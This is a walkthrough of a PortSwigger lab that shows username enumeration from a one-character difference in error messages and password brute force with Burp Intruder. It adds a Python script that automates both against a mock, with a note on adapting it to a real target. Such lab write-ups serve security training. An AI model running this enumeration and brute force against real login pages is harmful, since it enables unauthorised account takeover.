Username enumeration via subtly different responses
To access the lab visit the following link:
This lab is subtly vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password, which can be found in the following wordlists:
To solve the lab, enumerate a valid username, brute-force this user’s password, then access their account page.
Click on the given button to access the lab
On the lab’s home page there is a “My account” link. Click it to reach the login page.
Log in with any made-up credentials so that Burp captures the login request. In this case I used “test” as both the username and the password.
The response says “Invalid username or password.” This is a generic error message: on its face it does not disclose whether the username or the password is wrong, so we will feed both provided wordlists through Intruder and look for any response that deviates from this baseline.
Let’s examine the captured login request in Burp Suite. Right-click on the request and select “Send to Intruder.”
Now, let’s enumerate the username using Burp Intruder.
Open the Intruder tab and its “Positions” sub-tab. The captured request is shown there, including the username and password we submitted.
Ensure the attack type is set to “Sniper”. This is the default attack type and it is suitable for testing a single parameter, as here.
Click on “Clear §” to remove all the automatic payload positions, then highlight the value of the username parameter.
Click on “Add §” to mark this value as a payload position. It will be surrounded by § symbols.
We have the username list provided by PortSwigger on the lab page.
Navigate to the “Payloads” sub-tab in Intruder.
In the “Payload Sets” section, make sure “Payload set 1” is selected, corresponding to the position you marked.
Under “Payload Options”, select “Simple list”.
Copy the list of usernames provided on the lab page and click “Paste” in the payload settings.
You can also save the list of usernames in a text file and load a list of usernames from a file by clicking on “Load”.
Now that we are all set with our payloads configured, click on the “Start attack” button.
Burp Suite will start sending requests with each username in our list and display the results in the Intruder tab.
Upon reviewing the results, we observe that every status code is the same and the response length varies from request to request, so neither the Status nor the Length column on its own singles out a username. We need to compare the content of the responses instead.
Let’s go back to our original login request and copy the error message from its response.
Now, in the results tab of intruder we can see the results filter. Click on this to add a filter based on error message.
The filter panel will appear. Paste the copied error message into the search box, check the “Negative search” option and click “Apply”.
This narrows the results by hiding every request whose response contains the exact baseline error message. Whatever remains responded differently, which may indicate a valid username or some other distinct code path worth inspecting.
As soon as we apply this filter, we are left with a single request, the one whose payload was “alerts”. When we render the response of this request, we can see that it says "Invalid username or password" without a period at the end.
Every other response includes the period. This subtle difference suggests that the username “alerts” is valid: the application takes a slightly different code path when the username exists but the password is wrong, and that difference leaks through the error message. The discrepancy therefore lets us infer that “alerts” is a legitimate username. (The valid username is different for each lab instance; what matters is the response that deviates from the baseline, not this particular value.)
We have identified a valid username. Let’s get back to the Intruder “Positions” sub-tab.
Click on “Clear §” to remove all the payload positions. Replace the value of the username parameter with the username we just found, then highlight the value of the password parameter.
Click on “Add §” to mark this value as a payload position. It will be surrounded by § symbols.
We have the password list provided by PortSwigger on the lab page.
Copy the list of passwords provided on the lab page and click “Paste” in the payload settings.
You can also save the list of passwords in a text file and load it by clicking on “Load”.
Once your payloads are configured, click on the “Start attack” button.
Burp Suite will start sending requests with each password in our list and display the results in the Intruder tab.
To spot the odd one out, click on the “Status code” column header to sort the results by status code.
All responses share the same status code except one: a correct login redirects to the account page instead of re-rendering the login form with the error, so the request with the differing status code carries our candidate password.
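The two Intruder attacks above amount to one repeatable procedure: compare every response against a known-bad baseline on the error text rather than on length, then brute-force the password for the username that deviated, this time keying on the status code. The script below is an added example that implements that procedure in Python; it is not part of the original walkthrough and does not talk to the real lab. The `mock_lab_login` function is a constructed stand-in that reproduces the behaviour described in the text (a random-length token that makes the Length column noisy, a missing trailing period for the valid user, a redirect on success), and the account name and password it uses are assumptions for the mock only.

```python
"""Added example: username enumeration via a subtly different error message,
then password brute force with the username found. Everything here runs
offline against a constructed mock; it is not the lab's own code."""
import difflib
import random
import re
from typing import Callable, Iterable, List, Optional, Tuple

# (username, password) -> (status_code, response_body)
LoginFn = Callable[[str, str], Tuple[int, str]]

# Constructed mock of the lab's login endpoint. The credentials are assumptions
# chosen for the mock; the real lab picks its own per instance.
MOCK_VALID_USER = "alerts"
MOCK_VALID_PASS = "123456"


def mock_lab_login(username: str, password: str) -> Tuple[int, str]:
    """Mimics the lab: every response carries a random-length token (so the
    Length column alone is useless), the valid user's error message lacks the
    trailing period, and a correct login redirects instead of re-rendering."""
    token = "%x" % random.getrandbits(random.randint(16, 64))
    if username == MOCK_VALID_USER and password == MOCK_VALID_PASS:
        return 302, ""
    if username == MOCK_VALID_USER:
        msg = "Invalid username or password"   # subtle: no period
    else:
        msg = "Invalid username or password."
    return 200, f'<input name=csrf value="{token}"><p class=is-warning>{msg}</p>'


ERROR_RE = re.compile(r"<p class=is-warning>(.*?)</p>")


def error_message(body: str) -> Optional[str]:
    """Extract just the error text. This is what Intruder's negative-search
    filter keys on; the rest of the page may legitimately differ per request."""
    match = ERROR_RE.search(body)
    return match.group(1) if match else None


def enumerate_username(login: LoginFn, candidates: Iterable[str],
                       bogus_password: str = "wrong-password"
                       ) -> List[Tuple[str, int, Optional[str]]]:
    """Return the candidates whose response differs from the baseline in
    status code or error text. The baseline is a username that certainly
    does not exist, sent with the same bogus password as every candidate."""
    base_status, base_body = login("no-such-user-3f9a", bogus_password)
    base_msg = error_message(base_body)
    outliers = []
    for user in candidates:
        status, body = login(user, bogus_password)
        msg = error_message(body)
        if status != base_status or msg != base_msg:
            outliers.append((user, status, msg))
    return outliers


def describe_difference(base: str, other: str) -> List[str]:
    """Spell out exactly how two error messages differ, so a one-character
    change (like a missing period) is not overlooked when eyeballing them."""
    matcher = difflib.SequenceMatcher(None, base, other)
    return [f"{tag} {base[i1:i2]!r} -> {other[j1:j2]!r}"
            for tag, i1, i2, j1, j2 in matcher.get_opcodes() if tag != "equal"]


def brute_force_password(login: LoginFn, username: str,
                         candidates: Iterable[str]) -> Optional[str]:
    """Try each password for a known-valid username. The correct one is the
    first whose status code differs from the failure status observed for a
    deliberately wrong password (the lab redirects on success)."""
    fail_status, _ = login(username, "definitely-wrong-password-8c1e")
    for password in candidates:
        status, _ = login(username, password)
        if status != fail_status:
            return password
    return None


if __name__ == "__main__":
    # Constructed wordlists standing in for the ones on the lab page.
    usernames = ["carlos", "root", "alerts", "admin", "test"]
    passwords = ["password", "letmein", "123456", "qwerty"]

    found = enumerate_username(mock_lab_login, usernames)
    for user, status, msg in found:
        _, base_body = mock_lab_login("no-such-user-3f9a", "wrong-password")
        print(f"{user}: status={status} message={msg!r}")
        print("  differs from baseline by:",
              describe_difference(error_message(base_body) or "", msg or ""))

    if found:
        user = found[0][0]
        print(f"password for {user}:",
              brute_force_password(mock_lab_login, user, passwords))
```

The two comparisons deliberately key on different signals: `enumerate_username` ignores the status code difference it never sees and compares the parsed error text, because that is the only field that changes between a valid and an invalid username, while `brute_force_password` ignores the body and watches the status code, because that is what changes on a successful login. Against a real target, `mock_lab_login` would be replaced by a function that issues the captured POST request and returns the status and body; the rest of the logic is unchanged.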
With both the username and the password in hand, we can return to the login page and verify them.
The login succeeds, the account page is displayed, and the lab is marked as solved.
Congratulations! The walkthrough of fourth authentication lab finishes here.
You can see walkthrough of Fifth lab by clicking the following link: